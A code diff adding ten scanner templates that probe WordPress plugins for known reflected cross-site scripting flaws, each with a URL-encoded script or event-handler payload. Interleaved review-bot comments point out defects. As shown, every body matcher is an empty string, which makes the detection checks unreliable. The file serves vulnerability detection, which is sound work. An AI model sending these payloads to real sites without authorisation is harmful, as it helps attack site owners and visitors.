diff --git a/CVE-2017-17043.yaml b/CVE-2017-17043.yaml
new file mode 100644
index 0000000..3d321b4
--- /dev/null
+++ b/CVE-2017-17043.yaml
@@ -0,0 +1,30 @@
+id: CVE-2017-17043
+
+info:
+ name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%22%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2017-17059.yaml b/CVE-2017-17059.yaml
new file mode 100644
index 0000000..ecf71fa
--- /dev/null
+++ b/CVE-2017-17059.yaml
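Review bot: In CVE-2017-17043.yaml the body matcher's only word is the empty string (`- ""`), which every response body contains, so as shown the template fires on any 200 response served as text/html and never proves the parameter was reflected. The word should be the decoded markup the request sends, for example `- "<script>alert(123)</script>"`, so the match depends on the reflection itself. The marker may simply have been stripped when this page was rendered, but it is worth confirming against the committed file. The same `- ""` appears in the other nine templates in this diff (CVE-2017-17059, CVE-2017-17451, CVE-2017-18536, CVE-2017-9288, CVE-2018-11709, CVE-2018-20462, CVE-2018-5316, CVE-2019-15713, CVE-2019-16332), each of which needs the decoded form of its own test string.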
@@ -0,0 +1,34 @@
+id: CVE-2017-17059
+
+info:
+ name: amtyThumb posts 8.1.3 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php.
+ reference: |
+ - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-17059
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E=1"
+
+ body: "amty_hidden=1"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2017-17451.yaml b/CVE-2017-17451.yaml
new file mode 100644
index 0000000..40a4e59
--- /dev/null
+++ b/CVE-2017-17451.yaml
@@ -0,0 +1,30 @@
+id: CVE-2017-17451
+
+info:
+ name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2017-18536.yaml b/CVE-2017-18536.yaml
new file mode 100644
index 0000000..5ac65f8
--- /dev/null
+++ b/CVE-2017-18536.yaml
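Review bot: In CVE-2017-17059.yaml the POST request sends `body: "amty_hidden=1"` without declaring a content type, so the target may not parse the field as form data and the code path that reflects the query string may never run. That would make the check a silent false negative on an affected install. Unless the engine is known to set the header itself, add a `headers:` map to the request with `Content-Type: application/x-www-form-urlencoded`.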
@@ -0,0 +1,30 @@
+id: CVE-2017-18536
+
+info:
+ name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
+ reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2017-9288.yaml b/CVE-2017-9288.yaml
new file mode 100644
index 0000000..19bdc03
--- /dev/null
+++ b/CVE-2017-9288.yaml
@@ -0,0 +1,30 @@
+id: CVE-2017-9288
+
+info:
+ name: Raygun4WP <= 1.8.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter).
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2018-11709.yaml b/CVE-2018-11709.yaml
new file mode 100644
index 0000000..4f305a6
--- /dev/null
+++ b/CVE-2018-11709.yaml
@@ -0,0 +1,30 @@
+id: CVE-2018-11709
+
+info:
+ name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709
+ tags: cve,cve2018,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/index.php/community/?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2018-20462.yaml b/CVE-2018-20462.yaml
new file mode 100644
index 0000000..79a0cbd
--- /dev/null
+++ b/CVE-2018-20462.yaml
@@ -0,0 +1,30 @@
+id: CVE-2018-20462
+
+info:
+ name: JSmol2WP <= 1.07 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. A cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462
+ tags: cve,cve2018,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2018-5316.yaml b/CVE-2018-5316.yaml
new file mode 100644
index 0000000..7553a25
--- /dev/null
+++ b/CVE-2018-5316.yaml
@@ -0,0 +1,30 @@
+id: CVE-2018-5316
+
+info:
+ name: SagePay Server Gateway for WooCommerce <= 1.0.8 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The SagePay Server Gateway for WooCommerce plugin before 1.0.9 for WordPress has XSS via the includes/pages/redirect.php page parameter.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5316
+ tags: cve,cve2018,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2019-15713.yaml b/CVE-2019-15713.yaml
new file mode 100644
index 0000000..55c9e48
--- /dev/null
+++ b/CVE-2019-15713.yaml
@@ -0,0 +1,32 @@
+id: CVE-2019-15713
+
+info:
+ name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site.
+ reference: |
+ - https://wpscan.com/vulnerability/9267
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-15713
+ tags: cve,cve2019,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%28123%29%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2019-16332.yaml b/CVE-2019-16332.yaml
new file mode 100644
index 0000000..f067dd1
--- /dev/null
+++ b/CVE-2019-16332.yaml
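Review bot: In CVE-2019-15713.yaml, `reference: |` makes the two URLs a single multi-line string that only looks like a list, so tooling that reads references as a sequence gets one blob with literal `- ` prefixes. Write it as a real YAML sequence: `reference:` followed by `- https://wpscan.com/vulnerability/9267` and `- https://nvd.nist.gov/vuln/detail/CVE-2019-15713` as list items. The `reference: |` in CVE-2017-17059.yaml has the same shape. The description here also never names the My Calendar plugin or the affected version, which makes a finding harder to triage from the report alone.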
@@ -0,0 +1,30 @@
+id: CVE-2019-16332
+
+info:
+ name: API Bearer Auth <= 20181229 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16332
+ tags: cve,cve2019,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3Cscript%3Ealert%28123%29%3C/script%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200